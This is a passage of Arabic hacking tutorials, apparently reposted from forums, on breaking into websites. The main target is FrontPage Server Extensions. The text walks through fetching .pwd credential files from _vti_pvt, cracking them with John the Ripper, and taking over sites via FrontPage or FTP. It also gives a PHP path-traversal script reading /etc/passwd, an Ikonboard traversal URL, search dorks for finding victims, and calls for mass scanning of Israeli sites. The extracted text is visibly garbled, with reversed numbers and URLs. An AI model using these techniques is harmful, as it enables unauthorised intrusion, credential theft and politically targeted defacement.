  ‫تدعم بروتوكول الـ ‪ FTP‬و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتماداً على البرمجيات التي‬
                                                                                 ‫تعمل بناحية الخادم .‬
            ‫و اآلن قم بتنفيذ التالي لمعرفة كيفية االتصال بالـ ‪: FrontPage Extension Server‬‬

     ‫( مالحظة : سأتكلم حاليا ً عن حزمة الـ ‪ XP‬و التي ال تختلف أبداً عن الحزم الباقية إال في بعض النقاط‬
                                                                                              ‫الشكلية )‬

                          ‫* قم بتشغيل برنامج الـ ‪ FrontPage‬و الذي يأتي مرفقا ً مع حزمة ‪. Office‬‬
                                                          ‫* من قائمة ‪ File‬قم باختيار ‪. Open Web‬‬
                                      ‫* قم باضافة المعرف و كلمة المرور ( األصلية و ليست المشفرة ) .‬
 ‫* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و‬
                                                                    ‫المجلدات و معاينة الشفرة المصدرية‬
                                                                                             ‫للملفات .‬
   ‫* اذا لم تتم العملية بنجا ح فهذا يعني بأن الموقع ال يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و‬
                                                             ‫يطلب منك معاينتها في وضعية القراءة و ال‬
                         ‫يظهر لك الشفرة المصدرية األصلية وال المجلدات و الملفات التي يحويها الموقع .‬

                                             ‫@ كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ال :‬

                              ‫يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها :‬

                                                                          ‫* معاينة ملف نجا ح التثبيت :‬

   ‫( مالحظة : قد ال تجد ملف _‪ vti_inf.html‬و لكن هذا ال يعني أن الموقع ال يدعم الخدمة ، كما أنه ال‬
                                                                                      ‫يعتبر ثغرة )‬

                 ‫- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ال .‬
             ‫- قم بمعانية ملف _‪ vti_inf.html‬بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :‬


                                                ‫771‬
                                                    ‫‪http://www.Victim.com/_vti_inf.html‬‬

‫- و عند معاينة الصفحة ستجد جملة ‪ ، FrontPage Configuration Information‬فهذا معناه أن‬
                                 ‫حزمة الـ ‪ FrontPage Extension Server‬قد تم تثبيتها‬
                                                                   ‫في الخادم بنجا ح .‬

                                                                   ‫و لمعرفة اصدارة الخدمة قم بالتالي :‬

                        ‫- قم بالنقر بزر الفأرة األيمن على الصفحة ، ثم قم باختيار ‪. Source Code‬‬
       ‫- قم بالبحث عن ‪ "FPVersion="Version‬حيث ‪ Version‬تشير لالصدار الخاص بالخدمة .‬

                                                                       ‫* عن طريق مجلد _‪: vti_cnf‬‬

                 ‫- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ال .‬
                             ‫- قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :‬

                                                          ‫‪http://www.Victim.com/_vti_cnf‬‬

                          ‫- قم بالنقر بزر الفأرة األيمن على الصفحة ، ثم قم باختيار ‪. Source Code‬‬
                                                                ‫- قم بالبحث عن الشفرة التالية :‬

                                                                    ‫‪vti_generator:Programe‬‬

            ‫- حيث ‪ Programe‬يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو ‪Microsoft‬‬
                                              ‫‪ FrontPage X‬و االصدارة الخاصة به هي ‪. X‬‬

                                                              ‫* الكشف عن الشفرة المصدرية للصفحة :‬

                 ‫- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ال .‬
                           ‫- قم بالنقر بزر الفأرة األيمن على الصفحة ، ثم قم باختيار ‪. Source Code‬‬
                             ‫- قم بالبحث بين ترميزي الرأس <‪ >Head></Head‬عن الشفرة التالية :‬

                            ‫<‪>"Meta Name="GENERATOR" Content="Programe‬‬

‫- حيث ‪ Programe‬يرمز لنوع البرنامج و اذا كان البرنامج هو 0.‪ Microsoft FrontPage X‬يتبين‬
                                           ‫لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و‬
                                                                ‫االصدارة الخاصة به هي ‪. X‬‬

                                                                       ‫* عن طريق موقع ‪: NetCraft‬‬

                                                               ‫- قم بزيارة الموقع ‪. NetCraft.net‬‬
                                                       ‫- قم بكتابة عنوان الموقع مستثنيا ً الـ ‪. //:http‬‬
                                                                                  ‫- انتظر بضع ثواني .‬
    ‫- ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة‬
                                                             ‫قابلية دعمه للبرنامج ، و من تلك الخدمات‬
        ‫خدمة الـ ‪ FrontPage‬و ستظهر لك بالشكل ‪ mod_frontpage/X‬حيث ‪ X‬يرمز الصدارة الـ‬
                                                          ‫‪. FrontPage Extensions Server‬‬

                                                                             ‫* عن طريق الـ ‪: Telnet‬‬


                                                ‫871‬
   ‫( مالحظة : تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات‬
                                                                          ‫الطريقة السابقة )‬

                          ‫- من قائمة ‪ Start‬قم باختيار ‪ Run‬و اكتب بالنافذة التي ستظهر ‪. Telnet‬‬
                                             ‫- قم باالتصال بالموقع عبر المنفذ 20 بالشكل التالي :‬

                                      ‫08 ‪Microsoft Telnet> Open www.Victim.com‬‬

                        ‫- قم بارسال طلب ‪ Request‬للخادم و لتكن الطريقة ‪ Method‬هي ‪. Head‬‬

                                      ‫( مالحظة : عليك االلمام بكيفية التعامل مع بروتوكول ‪) HTTP‬‬

  ‫- قم بارسال التالي حيث ‪ http://www.Victim.net‬هو الموقع الضحية و ‪ ISP.net‬هو البروكسي‬
                                                       ‫الخاص بمزود الخدمة الخاص بك :‬

                                                       ‫1.1/‪Head www.Victim.net HTTP‬‬
                                                                      ‫‪Host: ISP.net‬‬
                                                                         ‫‪*/* :Accept‬‬
                                                                 ‫‪Connection: close‬‬

                                                                          ‫- انتظر بضع ثواني .‬
‫- ستستلم االجابة ‪ Response‬عن الطلب الذي ارسلتهب للخادم ‪ Server‬مثل تاريخ آخر تعديل للصفحة‬
                                                           ‫و نوع الملقم و الخدمات المتوفرة به .‬
   ‫و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ ‪ FrontPage‬و‬
                                                     ‫ستظهر لك بالشكل ‪mod_frontpage/X‬‬
                              ‫حيث ‪ X‬يرمز الصدارة الـ ‪. FrontPage Extensions Server‬‬

                                                             ‫@ كيفية استغالله ليصبح في صالحك :‬

    ‫اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صالحيات على مجلد الـ _‪ vti_pvt‬قم بالتالي :‬

    ‫( مالحظة : عليك االلمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ ‪ ، PHP‬كما أن على الموقع‬
                                                                           ‫الضحية دعم هذه اللغة )‬

                                                                  ‫* قم باالتصال بالموقع الضحية .‬
                                            ‫* قم بتحميل ملف ينتهي امتداده بـ ‪ PHP‬و ضمنه التالي :‬

                                                                                        ‫<?‪PHP‬‬

                                                            ‫$‪;)"open = FOpen($file, "r‬‬
                                                 ‫$‪;))get = FGets($open, FileSize($file‬‬

                                                                                   ‫‪;Echo $get‬‬

                                                                              ‫‪;FClose $open‬‬

                                                                                              ‫?>‬




                                             ‫971‬
‫و قمنا هنا برفع ملف ‪ PHP‬للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت‬
                                                                ‫ثم يعرضه ثم يغلق الملف ، و اآلن كل‬
  ‫ما عليك فعله اآلن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير‬
                                                               ‫‪ file‬و الملف الذي تريد معاينة الشفرة‬
                                                                       ‫المصدرية الخاصة به ، مثال :‬

                           ‫‪www.Victim.com/uploded_file...../../etc/passwd//:http‬‬

  ‫حيث ‪ uploded_file‬يشير السم الملف الذي قمت بتحميله ، و تستطيع اضافة اوامر تسمح لك بمعاينة‬
                                                          ‫الملفات و المجلدات الموجودة في الخادم .‬

                                             ‫انتهى،،،‬




                                              ‫081‬
‫" اختراق المواقع التي تدعم الفرونت بيج "‬

                                                         ‫<منقول من منتدى إعصار>‬
                                                                ‫<الكاتب: المدمر>‬

                                            ‫اكثر منا يعلم ان هذه الثغرة خاصة بنظام//‬

                                                                      ‫‪NT - Unix‬‬

      ‫2- وسف أقوم اآلن بشر ح طريقة لمعرفة هل هذه المواقع تدعم ‪ frontpage‬أم ال؟‬

                                                     ‫بعدة طرق ولن أذكر إال األسهل:‬

                                                    ‫-بالذهاب إلى موقع‪netcraft‬‬
                                               ‫/‪http://www.netcraft.com‬‬
                                        ‫وكتابة اسم الموقع وبعد البحث سوف يظهر‬
                                                         ‫‪mod_frontpage/x‬‬
                                           ‫(=‪x‬رقم اإلصدار الخاص بالفرونت بيج)‬
                                                          ‫-عن طريق إضافة جملة‬
                                                               ‫/_‪vti_inf.html‬‬
       ‫بعد عنوان الموقع لنفرض أن الموقع:/‪http://www.almodammer.com‬‬
                                                ‫نضيف الجملة ليصبح بهذه الطريقة‬
                     ‫‪http://www.almodammer.com/_vti_inf.html‬‬
                                                              ‫وبعدها اضغط‪Enter‬‬
                                          ‫ورا ح يطلعلك في أول الصفحة هذه الكلمة‬
                             ‫‪Frontpage Configuration Information‬‬
                                       ‫أي قد تم تثبيت مجلدات وبرامج الفرونت بيج‬
                             ‫-وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم ال‬
                                                                           ‫بإضافة‬
                                                                      ‫/_‪vti_cnf‬‬
                                                    ‫بعد عنوان الموقع كهذا المثال:‬
                           ‫‪http://www.almodammer.com/_vti_cnf‬‬
                                                   ‫واضغط زر الفأرة األيمن واختار‬
                                                                ‫‪source‬المصدر‬
                                                                        ‫وابحث عن‬
                                                ‫‪vti_generator:Programe‬‬
                                                                             ‫حيث‬
               ‫‪Programe‬تعني لنوع برنامج الفرونت بيج واإلصدارات الخاصة به‬

                                  ‫--------------------------------------------------‬

        ‫6- ألحين وعرفنا الموقع يدعم ‪ frontpage‬كيف نقدر نوصل لملف الباسوورد؟‬
                             ‫بسيطة إنت هات الموقع الي يبدعم ‪ frontpage‬واعلمك‬
                                                             ‫يعني وعلى سبيل المثال‬
                                           ‫/‪http://www.almodammer.com‬‬
                                   ‫يدعم ‪ fontpage‬طيب نذهب إلى ملف_‪vti_pvt‬‬
                                                                           ‫كذا يعني‬
                              ‫‪http://www.almodammer.com/_vti_pvt‬‬
                  ‫وأول ماندخله نالحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:‬


                              ‫181‬
                                                                    ‫=============‬
                                                                   ‫‪Adminstrator.pwd‬‬
                                                                  ‫‪Adminstrators.pwd‬‬
                                                                       ‫‪Service.pwd‬‬
                                                                         ‫‪Users.pwd‬‬
                                                                          ‫‪User.pwd‬‬
                                                                        ‫‪Author.pwd‬‬
                                                                    ‫=============‬

                             ‫ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نالحظ نالحظ وجود‬
                                                                ‫‪username:passwd‬‬
                                                                 ‫اسم المستخدم والباسوورد‬
‫يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف ‪ service‬يحتوي على‬
                                                                   ‫‪user / password‬‬
                                                                      ‫وهذا مضمون الملف‬
                                                   ‫‪operator:hi9LHn9wAMuKM‬‬
                                                          ‫حيث اسم المستخدم‪:operator‬‬
                                         ‫الباسوورد المشفرة هي‪:hi9LHn9wAMuKM‬‬

                        ‫ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إال نفك تشفيره‬
                                                                         ‫وهذا يتم ببرامج كثير‬
                                                                        ‫=)‪=(Crack Jack‬‬
                                                                  ‫=)‪=(John The Ripper‬‬

                                                       ‫را ح نستخدم األفضل واألكثر تداوال وهو‬
                                                                     ‫‪John The Ripper‬‬
                                                            ‫لتحميل البرنامج من هذا الموقع::‬
                                                   ‫‪http://www.openwall.com/john‬‬

                                                                ‫كيف تفك التشفير بهذا البرنامج‬

                                                        ‫أول شي ترو ح تنقل البرنامج إلى مجلد‬
                                                                                          ‫‪\:c‬‬
                                                                       ‫بعدين تفتح مجلد‪RUN‬‬
    ‫وتسويلك مستند نصي ‪ txt‬وتسمي الملف ‪ passwd‬وتضع فيه كلمة السر الي تبي تفك تشفيرها‬
                                                                                    ‫إذهب إلى‬
                                                                                  ‫ابدأ ‪start‬‬
                                                                                 ‫تشغيل ‪run‬‬
                                                                                   ‫اكتب األمر‬
                                                                               ‫‪command‬‬
                                                         ‫اضغط على ‪ Enter‬وبعدها را ح يفتح‬
                                                                                ‫إطار الـ‪DoS‬‬
                                                                        ‫اذهب إلى مجلد‪RUN‬‬
            ‫وذلك بالخروج من المجلدات الي را ح تظهر لك واذا تبي تطلع من أي مجلد استخدم األمر‬
                                                                                        ‫‪..cd‬‬
                                                                                  ‫حتى توصل‬
                                                                                        ‫‪<\:c‬‬
                                                                                  ‫بعدين اكتب‬
                                                                                  ‫‪cd john‬‬
                                                                          ‫اضغط على ‪Enter‬‬


                                         ‫281‬
                                                               ‫ورا ح يظهر لك بهذا الشكل‬
                                                                            ‫‪<c:\john‬‬
                                                                                  ‫واكتب‬
                                                                             ‫‪cd RUN‬‬
                                                     ‫وبتدخل المجلد ليصبح بهذه الطريقة‬
                                                                     ‫‪<c:/john/RUN‬‬
                                            ‫ألحين نكتب أوامر برنامج‪John The Ripper‬‬
                                                                                    ‫وهي‬
                                                                                 ‫====‬
                                                            ‫‪john -i:all passd.txt‬‬
                                                              ‫--------------------------‬
                                                  ‫يبحث لك عن جميع األنواع واالحتماالت‬

                                                                                     ‫====‬
                                                         ‫‪john -i:Alpha passwd.txt‬‬
                                                          ‫----------------------------------‬
                                                                  ‫يبحث عن األحرف الصغيرة‬

                                                                                     ‫====‬
                                                         ‫‪john -i:Digits passwd.txt‬‬
                                                          ‫----------------------------------‬
                                                                            ‫يبحث عن األرقام‬

                                                                                   ‫====‬
                                                        ‫‪john -single passwd.txt‬‬
                                                         ‫---------------------------------‬
                                     ‫أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم‬

             ‫--------------------------------------------------------------------------------‬
‫وبعد ماتجرب كل هذي األوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد وال أل إذهب إلى‬
                                                                                 ‫‪john.pot‬‬
                           ‫الموجود داخل البرنامج ورا ح يعرض لك الباسوورد وبعد فك تشفيرها‬
             ‫--------------------------------------------------------------------------------‬

                                   ‫إنت ألحين مستريح عندك ‪ username‬والـ‪password‬‬
                                                                  ‫وش بقالك ؟!!‬

                                ‫يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/‬
                                                                                      ‫)1(‬
                                                                             ‫‪frontpage‬‬
                                                                                     ‫بعدين‬
                                                                           ‫‪file‬وتذهب إلى‬
                                                                     ‫‪open web‬وتضيف‬
                            ‫االسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك‬

                                                                                      ‫)2(‬
                                                                                 ‫من‪FTP‬‬
                                                             ‫وعليك ببرامج الـ ‪FTP‬المنتشرة‬
                                                                              ‫كالـ‪ws-ftp‬‬
                                                                             ‫والـ ‪pro ftp‬‬


                                      ‫381‬
                                              ‫والمزيد ...‬
‫ويمكنك عمل الطريقة من ‪ DOS‬ولكن البرامج أسهل لك وأضمن لك‬

‫======================================‬

     ‫وألحين أكيد تبون تجربون على موقع أقولكم روحوا‪google‬‬
                          ‫/‪http://www.google.com‬‬
                                     ‫واكتبوا في إطار البحث‬
                                              ‫/_‪vti_pvt‬‬
             ‫ورا ح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة‬

                                      ‫وعندك محرك بحث‬
                         ‫/‪http://www.altavista.com‬‬
                                    ‫تكتب في محرك البحث‬
                                  ‫‪link:service.pwd‬‬

                                                  ‫أو..‬
                                  ‫‪link:adminstrators‬‬

         ‫وغيرها من الملفات االحتمال وجود ‪ password‬فيها.‬

       ‫انتهى،،،‬




         ‫481‬
                             ‫" اإلختراق العشوائي "‬
                                                                                            ‫<منقول>‬
                                                                                    ‫<الكاتب: الكندور>‬

                                              ‫- ماهو الـإختراق العشوائي ‪Random Hacking‬‬
                                    ‫- تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬
                                                         ‫- كيف تستغل اي ثغره بعد الحصول عليها‬

                                                  ‫- ماهو الـإختراق العشوائي ‪Random Hacking‬‬
‫هو البحث في كميه كبيره من المواقع عن ثغره محدده ، وهذا سهل ويعود بمواقع كثيره جدا جاهزه لإلختراق‬
   ‫، مثال بسيط جدا ، رو ح على محرك بحث ، من محركات البحث التي تعتمد على الـ ‪ spiders‬أو العناكب‬
 ‫مثل ‪ altavista.com‬وأكتب ‪( ، link:xxxx.cgi or pl‬إرجع لشر ح زورو في رياضيات البحث) مثال‬
    ‫نبحث عن لنك لملف بإسم ‪ help.cgi ، link:help.cgi‬المواقع المردوده لك نتيجه للبحث كلها تملك‬
   ‫منتدى ‪ ، Ikonboard‬إفتح واحد منها وأبحث في المصدر الكود ‪ HTML‬عن السكربت الذي بحثت عنه‬
              ‫‪ help.cgi‬لتعرف اين مكانه ، لنفرض مكانه هنا -‪http://www.example.com/cgi‬‬
                                                                                    ‫‪bin/help.cgi‬‬
                          ‫أكتب بعد الملف غير العنوان ليصبح -‪http://www.example.com/cgi‬‬
                               ‫00%‪bin/help.cgi?helpon=../members/[member].cgi‬‬
                                    ‫مع مالحظه تغيير [‪ ]member‬بإسم عضو وبدون القوسين [] طبعا‬
   ‫سوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى ‪Ikonboard‬‬
 ‫7.1.2 وهذا ليس لب موضوعي ولكن هي بدايه ومثال ال تحفظه ألني أحضرت أبسط مثال فقط فيوجد غيره‬
         ‫مئات بل آالف ملفات الـ ‪ CGIScript‬تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خالل ‪url‬‬
      ‫للحصول على مثل هذه اإلستثمارات لثغرات ملفات السي جي آي سكريبت شوف األرشيف هذا وهو لغته‬
                                    ‫روسيه أعتقد ولكن ما يهم ألننا نبحث عن الـ ‪ Exploit‬أو اإلستثمار‬
                                           ‫‪/http://www.secure.f2s.com/eng_ver/bugs‬‬
‫وممكن تأخذ إسم المنتج مثال وتضعه في محرك البحث لـ ‪ /http://www.securiteam.com‬وتشوف‬
     ‫النتائج ، أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا‬
   ‫أعجبت بها وهي مختصه في األمن وليس لـثغرات السي جي آي سكربت ، يعني امن واخبار وكل شئ ....‬
  ‫ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ، هو برنامج لتسهيل عمليه الحصول‬
                                                                               ‫على األخبار ووو...الخ‬


                                      ‫- تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬
     ‫اإلختراق العشوائي إذا كان فعال عشوائي ، يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ، لكن‬
‫ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ، أنا اقول لك كيف ، مثال إسرائيل اللي الكل يكرهها ،‬
     ‫الذين يأمرون الفلسطينيين بأوقاف إطالق النار :) ، الكل يكرههم ليس ألجل أنهم يهود ، ال نكرههم ألنهم‬
     ‫ظلموا فلسطين ، عندهم موقع فيه آالف من مواقعهم هذا هو 22262 ‪ sites‬تنتهي بـ ‪ co.il‬و .222‬
   ‫‪ sites‬تنتهي بـ ‪ org.il‬و 21 ‪ sites‬تنتهي بـ ‪ ac.il‬و 01 ‪ .sites‬تنتهي بـ ‪ gov.il‬وهذه مهمه ، و‬
    ‫.5 ‪ .sites‬تنتهي بـ ‪ net.il‬و 86 ‪ .sites‬تنتهي بـ ‪ muni.il‬و 8226 ‪ sites‬تنتهي بـ ‪ ، com‬و‬
   ‫132 ‪ .sites‬تنتهي بـ ‪ net‬و ‪ .org - 121 sites‬و ‪ .edu - 4 sites‬لعينه ، 48 - ‪israel.net‬‬
                         ‫‪ .sites‬و ‪........ .il - sites‬عشان تحصل على كل هذه السايت رو ح الموقع هذا‬
                                                         ‫‪http://iguide.co.il/sites/sites.htm‬‬

                                                                              ‫وفيه كمان محركات بحث‬

                                                              ‫‪/http://www.achla.co.il‬‬
                                         ‫1=‪http://www.reshet.co.il/data/index.vs?dw‬‬
                                                            ‫‪/http://www.maven.co.il‬‬
                                                             ‫‪/http://www.tapuz.co.il‬‬
                                                              ‫‪/http://www.walla.co.il‬‬


                                                ‫581‬
                                                             ‫‪http://www.info.gov.il/find.pl‬‬

                                                   ‫وفيه محرك أعدم منها واللي هو ‪altavista.co.il‬‬

     ‫المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ، يستخدم اللغه التي يتقنها‬
                                 ‫ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها‬

 ‫العمليه الثانيه هي البحث فيها كلها عن منتج ، مثال ‪ ، /w3-msql‬الطريقه سهله جدا ، أوال يتم الشبك مع‬
          ‫بروكسي مثال 0808: ‪ proxy.isp.net.sa‬وثم يرسل له أمر ‪ ، GET‬مثال ترسل للبروكسي‬


                           ‫0.1/‪GET http://www.com.il/cgi-bin/w3-msql/ HTTP‬‬
           ‫‪*/* ,Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg‬‬

                                                    ‫‪Accept-Language: ar-sa‬‬
                 ‫89 ‪)User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows‬‬
                                                           ‫‪Host: www.com.il‬‬
                                              ‫‪Proxy-Connection: Keep-Alive‬‬

     ‫وهو يطلب من البروكسي أحضار الموقع ‪ ، /http://www.com.il/cgi-bin‬يتضح طلبنا لـ -‪cgi‬‬
  ‫‪ ، /bin/w3-msql‬في الحقيقه ال نبحث عن ثغرات سي جي آي ، ولكن نبحث عن كل المواقع التي يوجد‬
   ‫بها المنتج ‪ ، WWWMSQL‬يعني المواقع اإلسرائليه مثال التي جمعناها في ملف تكست كلها تأخذ واحد‬
  ‫واحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن ‪ cgi-bin/w3-msql‬وثم يحفظ‬
 ‫رد البروكسي في ملف خارجي ، وهكذا حتى ننتهي من كل المواقع ، وثم نفتح الملف ونشوف التي تم إيجاد‬
 ‫المنتج ‪ WWWMSQL‬داخها والتي لم يوجد ، ونتوجه الى سيكيورتي فوكس واال سيكيورتي تيم واال أي‬
   ‫موقع يعجبك وابحث عن ‪ ، w3-msql‬مثال في سيكوتي تيم نجد ‪ Exploit‬لـ ‪ w3-msql‬يمكن تطبيقه‬
‫من المتصفح ، وهو هنا ‪http://www.securiteam.com/exploits/2WUQBRFS3A.html‬‬
 ‫طريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا ‪ Random Hacking‬يعني إختراق عشوائي ،‬
  ‫ولكن لو فعال بحثت عن ‪ w3-msql‬في المواقع اإلسرائليه فأنا أقول لك بأنك ما را ح تلقى كثير أو لن تجد‬
   ‫شئ ، ممكن تبحث عن /_‪ /vti_pvt‬لترصد كل المواقع التي فيها فرونت بيج ، وطبعا بعد ما يتم حفظ كل‬
  ‫المعلومات المسترجعه من البروكسي تكون بشكل ‪ HTML‬عشان كذا أنت خل الملف يكون بنسق *.‪html‬‬
            ‫وافتحه وتجد كل المواقع ، اللي كتب عنها ..‪ The page cannot be displayed‬واللي‬
   ‫‪ Forbddien‬واللي ....‪.... not found‬الخ ، من هذه الردود تعرف اللي نت فاوند واال موجود ولكن‬
  ‫غير مسمو ح بالوصول له ..الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود .....والباقي عليك‬


                                                             ‫- كيف تستغل اي ثغره بعد الحصول عليها‬
    ‫إذا كانت ‪ url‬ما يبغا لها فلسفه ، كود ‪ c‬وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجون‬
   ‫ثاني لـه ولكن بلغه ‪ perl‬أو ‪ Shell *.sh‬وهو الذي يقابل ‪ Batch‬في ويندوز وتحدثنا عنها في كوكب‬
   ‫لغات البرمجه ، من الدوس بعد ما تثبت أكتيف بيرل أكتب ‪ perl exploit.pl‬إذا كان الـ ‪ exploit‬بلغه‬
   ‫بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ، وهذه األشياء تكون مكتوبه بين عالمات التعليقات :)‬
  ‫وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ، في هذه الناحيه ال تطلب شر ح بالصور :) إذا رجع لك رد‬
          ‫طويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق عالمة < وثم مسافه وإسم الملف مثال ‪perl‬‬
                                                                         ‫‪exploit.pl > log.htm‬‬
‫وبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ، ألن بعض الـ ‪ Exploit‬كتب في اإلصدار أربعه وممكن‬
 ‫خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله‬
  ‫يطلب خبره في اللغه ، وعلى فكره ليونكس (أعمل على 2.6 ‪) RedHat‬فيه مفسر بيرل ممتاز جدا افضل‬
                                                                      ‫من أكتيف بيرل بعشرات المرات.‬
                                              ‫انتهى،،،‬



                                               ‫681‬
‫" الطريقة الصحيحة والمثلى في اختراق المواقع "‬

                                                                          ‫<منقول>‬
                                                               ‫<الكاتب: 119‪> marwan‬‬

                                             ‫اول خطوة في االختراق واللي هي اخذ المعلومات‬

          ‫يعني نعرف الموقع الفالني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.‬

                                                                      ‫الملقمات اشهرها اثنين‬

                        ‫‪ :IIS‬من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها)‬

             ‫‪ :apache‬من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.‬

                                                                                        ‫طيب‬

                                                                          ‫الحين عندنا موقع‬

                                ‫وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها‬

                                               ‫عندك الموقع ‪http://www.netcraft.net‬‬


                                                                                       ‫ادخله‬

                                                                                 ‫تالقي مربع‬

                                       ‫هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق‬

                                  ‫مثال نحط موقع البيت االبيض اللي هو ‪whitehouse.org‬‬

                                            ‫مالحظة: نكتبه من غير ‪ //:http‬وال / اللي باالخير‬

                 ‫‪http://uptime.netcraft.com/up/graph....whitehouse.org‬‬

                                                                         ‫را ح يطلع لنا التالي‬

‫‪The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows‬‬
                                                                ‫0002‬
                                                                 ‫طيب‬

                                                              ‫الحين عرفنا معلومتين مهمتين‬

                                                      ‫اول شيء انه شغال على الملقم 0.5‪IIS‬‬

                                                   ‫ثاني شيء شغال على نظام ويندوز 2226‬

                                                                                         ‫حلو‬



                                      ‫781‬
                                    ‫اول شيء نجرب ثغرات 0.5‪ IIS‬عليه (را ح احطها بعد الموضوع)‬

                    ‫إذا مانفع شيء نشوف ثغرات نظام ويندوز 2226 (را ح احط الموقع بعد الموضوع)‬

                                                                                              ‫طيب‬

                                                                  ‫الحين فيه حاجة اسمها يوني كود‬

                                                               ‫هذه تخترق فيها عن طريق المتصفح‬

  ‫وماتمشي إال مع ملقمات ‪ IIS‬وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. را ح احط امثلة‬
                                                                                       ‫عليها.‬

                                                                ‫طيب لنفرض انه ماطلع فيها ثغرات؟‬

                                                                      ‫نشوف محتويات الموقع نفسه‬

‫نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي را ح ارفقه في الرد اللي‬
                                                                                     ‫بعد الموضوع.‬

                                                                      ‫طيب لو كان السيرفر اباتشي؟‬

                                                ‫خلونا ناخذ مثال موقع ارانك ‪arank.com.www‬‬

                                                   ‫لو حللناه بالنيت كرافت را ح نشوف النتيجة التالية‬

            ‫)‪The site www.arank.com is running Apache/1.3.20 (Unix‬‬
     ‫6.0.4/‪mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP‬‬
‫6.9.0/‪mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL‬‬
                                                         ‫‪on Linux‬‬

                                                                         ‫طيب هنا يهمنا ثالث اشياء‬

  ‫الملقم وهو 02.3.1 ‪ apache‬و دعم فرونت بيج 0152.2.0.5/‪ FrontPage‬وهذه مليانة ثغرات‬
                                                           ‫والثالث النظام وهو ‪Linux‬‬

                                                                                              ‫طيب‬

                                                                                             ‫الملقم‬

        ‫اول شيء اباتشي من الملقمات الصعبة اإلختراق إال بعض اإلصدارات منها فنحط هذه على جنب.‬

                                                                           ‫نشوف دعم الفرونت بيج‬

                                                                ‫زي ماقلنا الفرونت بيج مليان ثغرات‬

                                                                        ‫وثغراته قوية وكثيرة تقريبا‬

                             ‫منها مجلد _‪ vti_pvt‬و _‪ private‬هذه اللي نحتاجها غيره مامنه فايدة‬



                                            ‫881‬
‫داخل المجلدين را ح نالقي اربع ملفات مهمة وهي ‪ service.pwd‬و ‪ users.pwd‬و ‪authors.pwd‬‬
                                    ‫و ‪ adminstators.pwd‬ويعتبر هذا اخطر ملف‬

    ‫طيب لو قدرنا ننزل واحد من الملفات هذه (مالحظة الثغرة هذه موجودة ب 21% من المواقع الموجودة‬
                              ‫عالنت) لو نزلناها نفتحها بالمفكرة ونالقي السطر هذا على سبيل المثال‬
                                                          ‫‪goodyco:CalXS8USl4TGM‬‬

